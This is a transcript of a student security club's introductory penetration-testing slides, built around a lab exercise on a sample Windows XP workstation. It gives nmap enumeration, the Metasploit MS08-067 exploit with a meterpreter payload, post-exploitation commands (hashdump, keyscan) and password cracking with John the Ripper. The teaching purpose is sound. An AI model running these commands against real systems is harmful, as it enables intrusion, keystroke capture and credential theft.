Presentation is loading. Please wait.

Presentation is loading. Please wait.

Penetration Testing 101 (Boot-camp)

Similar presentations


Presentation on theme: "Penetration Testing 101 (Boot-camp)"— Presentation transcript:

1 Penetration Testing 101 (Boot-camp)
Computer Security Group Mitchell Adair utdcsg.org

2 Outline “Interactive” meeting Introduction to Backtrack
A mini penetration test Scenario Methodology Enumeration, Exploitation, Post Exploitation Exercise Summary Resources

3 Scenario Company X wants you to test if their internal hosts are secure. They have given you a sample box with the default security settings the company uses for all user workstations. You take it back to the lab and begin to test it...

4 Outline Enumeration Exploitation Post Exploitation
OS, services, versions, filters Exploitation Match a service + version to a known vulnerability Exploit, getting shell access to the box Post Exploitation Shell is just the beginning... ;) Hashes, SSH / GPG keys, pivot, …

5 Enumeration 'Nmap ("Network Mapper") is a free and open source utility for network exploration or security auditing.' - nmap.org nmap [Scan Type(s)] [Options] {target specification} Scan Types -sS, Syn -sT, Connect -sA, Ack Options -O, OS -sV, services -v, verbose

6 … Enumeration nmap 192.168.1.1 nmap -v -sV -O 192.168.1.1 -p 1-65535
Default scan, full SYN, top 1000 ports nmap -v -sV -O p Verbose, services, OS, ports 1 through 65535 nmap -PN --script=smb* -sV -O Don't ping, run all smb* scripts, service, OS

7 Nmap Output Not shown: 996 closed ports
PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds 1025/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe) ... OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1, Microsoft Windows XP SP1 Host script results: | smb-os-discovery: Windows 2000 | smb-enum-domains: | Domain: MITCHELL-32D5C5 | |_ SID: S | |_ Users: add, Administrator, Guest, s3cr3tus3r, sally | Anonymous shares: IPC$ |_ Restricted shares: ADMIN$, C$ | smb-check-vulns: |_ MS08-067: VULNERABLE

8 Exploitation Metasploit – Penetration Testing Framework
tools, libraries, modules, and user interfaces # msfconsole msf > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST set PAYLOAD windows/meterpreter/bind_tcp exploit

9 Post Exploitation Gather useful information Pivot
SSH & GPG keys, hashes, etc... Meterpreter “post” modules Pivot meterpreter > hashdump sysinfo keyscan_(start | stop | dump) download migrate shell

10 … Post Exploitation We dumped the hashes... now what? John the Ripper
Pass the hash Crack the hash John the Ripper a tool to find weak passwords of your users John [options] password-files --wordlist --users, --groups --session, --restore

11 … Post Exploitation John --wordlist=/.../password.lst /tmp/hashes.txt
Loaded 6 password hashes with no different salts (NT LM DES [64/64 BS MMX]) ABC (sally) SECRET (s3cr3tus3r) (Guest) BASKETB (webmaster:1) ALL (webmaster:2) ADMIN (Administrator) guesses: 5 time: 0:00:00:00 100% c/s: trying: SKIDOO - ZHONGGU

12 So... let's get started Boot up to your Backtrack CD passwd
/etc/init.d/networking start startx Follow along... let's pwn this box :)

13 Summary Clearly... Company X's default user workstations needs some work. Now let's do the paperwork!... just kidding ;) Hopefully this gives everyone a hands on introduction to Backtrack, some essential tools, and the attacker's mindset & process. Feedback is always appreciated!

14 Resources utdcsg.org Nmap - nmap.org/5/ Metasploit - metasploit.com/
Presentations, articles, resources, etc. IRC irc.oftc.net, #utdcsg Nmap nmap.org/5/ Metasploit metasploit.com/ John the Ripper - openwall.com/john/


Download ppt "Penetration Testing 101 (Boot-camp)"

Similar presentations


Ads by Google